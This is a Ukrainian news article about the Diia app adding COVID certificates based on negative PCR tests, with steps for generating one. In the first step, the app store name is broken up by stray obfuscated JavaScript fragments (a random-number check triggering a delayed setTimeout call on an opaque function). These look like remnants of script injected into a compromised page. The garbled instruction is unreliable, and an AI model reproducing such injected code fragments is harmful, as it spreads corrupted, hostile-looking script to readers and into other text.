НовиниУ "Дії" з'явився новий різновид COVID-сертифікатів

У “Дії” з’явився новий різновид COVID-сертифікатів

-

У “Дії” з’явився новий різновид COVID-сертифікатів

У застосунку “Дія” з’явилася можливість згенерувати COVID-сертифікат про негативний результат ПЛР-тесту. “Ковід”-документ наразі перебуває на стадії бета-тестування. Про це повідомляється на сайті Міністерства цифрової трансформації.

“Від сьогодні Мінцифра спільно з МОЗ та НСЗУ запускає бета-тестування COVID-сертифікатів на підставі ПЛР-тестів у застосунку Дія. Сертифікат діятиме 72 години від моменту здавання аналізу”, – сказано в повідомленні.

Наразі протестувати можна ПЛР-тести з трьох лабораторій, але Мінцифра спільно з МОЗ та НСЗУ активно працює над підключенням інших до Електронної системи охорони здоров’я. Українців запевнили, що незабаром вони відображатимуться в застосунку.

Як генерується сертифікат:

  1. Після оновлення застосунку в PlayMarket, AppSdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore або AppGallery в “Дії” треба натиснути “Послуги”,
  2. Обрати пункт “COVID-сертифікати”
  3. Натиснути “Згенерувати сертифікат”
  4. Надати згоду на отримання даних з Електронної системи охорони здоров’я.
  5. Дані підтягнуться автоматично.

Сертифікат після цього з’явиться поруч із іншими цифровими документами в застосунку.

Наразі в застосунку “Дія” також доступні: міжнародний, “жовтий” та “зелений” внутрішні COVID-сертифікати про вакцинацію. “Жовтий” сертифікат можна отримати після однієї дози вакцини. Він діє 120 днів. А міжнародний та “зелений” діють 365 днів. У Мінцифри додали, що вже понад 900 тисяч українців отримали свої міжнародні COVID-сертифікати про вакцинацію.

 

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам